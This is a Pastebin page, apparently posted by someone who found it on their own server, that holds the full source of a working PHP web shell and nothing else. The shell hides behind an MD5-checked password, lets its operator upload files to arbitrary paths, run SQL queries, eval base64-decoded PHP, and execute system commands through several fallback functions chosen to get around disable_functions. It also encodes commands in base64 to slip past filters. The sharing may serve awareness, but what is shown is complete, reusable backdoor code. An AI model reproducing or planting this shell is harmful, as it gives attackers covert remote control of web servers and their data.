SHARE
TWEET

Malware found on one of my systems

LightningRurik May 16th, 2011 348 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. error_reporting(E_ERROR | E_WARNING | E_PARSE);
  2. ini_set('display_errors', "0");
  3.  
  4. if ($_POST["p"] != "") {
  5.         $_COOKIE["p"] = $_POST["p"];
  6.         setcookie("p", $_POST["p"], time() + 3600);
  7. }
  8.  
  9. if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
  10.         echo "<form method=post>";
  11.         echo "<input type=text name=p value='' size=50>";
  12.         echo "<input type=submit name=B_SUBMIT value='Check'>";
  13.         echo "</form>";
  14.         exit;
  15. }
  16.  
  17. if ($_POST["action"] == "upload") {
  18.  
  19.     $l=$_FILES["filepath"]["tmp_name"];
  20.     $newpath=$_POST["newpath"];
  21.     if ($newpath!="") move_uploaded_file($l,$newpath);
  22.     echo "done";
  23.  
  24.  
  25. } else if ($_POST["action"] == "sql") {
  26.  
  27.     $query = $_POST["query"];
  28.     $query = str_replace("\'","'",$query);
  29.     $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or di
  30. e ('Not connected : ' . mysql_error());
  31.     mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
  32.     mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
  33.     mysql_close($lnk);
  34.     echo "done<br><pre>$query</pre>";
  35.  
  36. } else if ($_POST["action"] == "runphp") {
  37.  
  38.     eval(base64_decode($_POST["cmd"]));
  39.  
  40. } else {
  41.  
  42.     $disablefunc = @ini_get("disable_functions");
  43.     if (!empty($disablefunc)) {
  44.         $disablefunc = str_replace(" ","",$disablefunc);
  45.         $disablefunc = explode(",",$disablefunc);
  46.     } else $disablefunc = array();
  47.  
  48.  
  49.     function myshellexec($cmd) {
  50.         global $disablefunc;
  51.         $result = "";
  52.         if (!empty($cmd)) {
  53.             if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec(
  54. $cmd,$result); $result = @join("\n",$result);}
  55.             elseif (($result = `$cmd`) !== FALSE) {}
  56.             elseif (is_callable("system") and !@in_array("system",$disablefunc))
  57.  {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_content
  58. s(); @ob_clean(); echo $v;}
  59.             elseif (is_callable("passthru") and !@in_array("passthru",$disablefu
  60. nc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_c
  61. ontents(); @ob_clean(); echo $v;}
  62.             elseif (is_resource($fp = @popen($cmd,"r"))) {
  63.                 $result = "";
  64.                 while(!feof($fp)) {$result .= @fread($fp,1024);}
  65.                 @pclose($fp);
  66.             }
  67.         }
  68.         return $result;
  69.     }
  70.         $cmd = stripslashes($_POST["cmd"]);
  71.         $cmd_enc = stripslashes($_POST["cmd_enc"]);
  72.  
  73.         if ($_POST["enc"]==1){
  74.                 $cmd=base64_decode($cmd_enc);
  75.         }
  76.         ?>
  77. <script language=javascript type="text/javascript">
  78. <!--
  79. var END_OF_INPUT = -1;
  80. var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M',
  81. 'N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g',
  82. 'h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0',
  83. '1','2','3','4','5','6','7','8','9','+','/');
  84. var reverseBase64Chars = new Array();
  85. for (var i=0; i < base64Chars.length; i++){
  86.     reverseBase64Chars[base64Chars[i]] = i;
  87. }
  88. var base64Str;
  89. var base64Count;
  90. function setBase64Str(str){
  91.     base64Str = str;
  92.     base64Count = 0;
  93. }
  94. function readBase64(){
  95.     if (!base64Str) return END_OF_INPUT;
  96.  
  97.     if (base64Count >= base64Str.length) return END_OF_INPUT;
  98.     var c = base64Str.charCodeAt(base64Count) & 0xff;
  99.     base64Count++;
  100.     return c;
  101. }
  102. function encodeBase64(str){
  103.     setBase64Str(str);
  104.     var result = '';
  105.     var inBuffer = new Array(3);
  106.     var lineCount = 0;
  107.     var done = false;
  108.     while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
  109.         inBuffer[1] = readBase64();
  110.         inBuffer[2] = readBase64();
  111.         result += (base64Chars[ inBuffer[0] >> 2 ]);
  112.         if (inBuffer[1] != END_OF_INPUT){
  113.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1]
  114.  >> 4) ]);
  115.             if (inBuffer[2] != END_OF_INPUT){
  116.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[
  117. 2] >> 6) ]);
  118.                 result += (base64Chars [inBuffer[2] & 0x3F]);
  119.             } else {
  120.  
  121.                 result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
  122.                 result += ('=');
  123.                 done = true;
  124.             }
  125.         } else {
  126.             result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
  127.             result += ('=');
  128.             result += ('=');
  129.             done = true;
  130.         }
  131.         lineCount += 4;
  132.         if (lineCount >= 76){
  133.             result += ('\n');
  134.             lineCount = 0;
  135.         }
  136.     }
  137.     return result;
  138. }
  139. function encodeIt(f){
  140.         l=encodeBase64(f.cmd.value);
  141.         f.cmd_enc.value=l;
  142.         f.cmd.value="";
  143.         f.enc.value=1;
  144.  
  145.         f.submit();
  146. }
  147. //--></script>
  148.         <?
  149.  
  150.     echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
  151.  
  152.     echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\
  153. " size=150>";
  154.    echo "<input type=hidden name=enc value='0'>";
  155.    echo "<input type=hidden name=cmd_enc value=''>";
  156.    echo "<input type=submit name=B_SUBMIT value='Go'>";
  157.    echo "</form>";
  158.    if ($cmd != "") {
  159.        echo "<pre>";
  160.        $cmd=stripslashes($cmd);
  161.        echo "Executing $cmd \n";
  162.        echo myshellexec("$cmd");
  163.        echo "</pre>";
  164.        exit;
  165.    }
  166. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top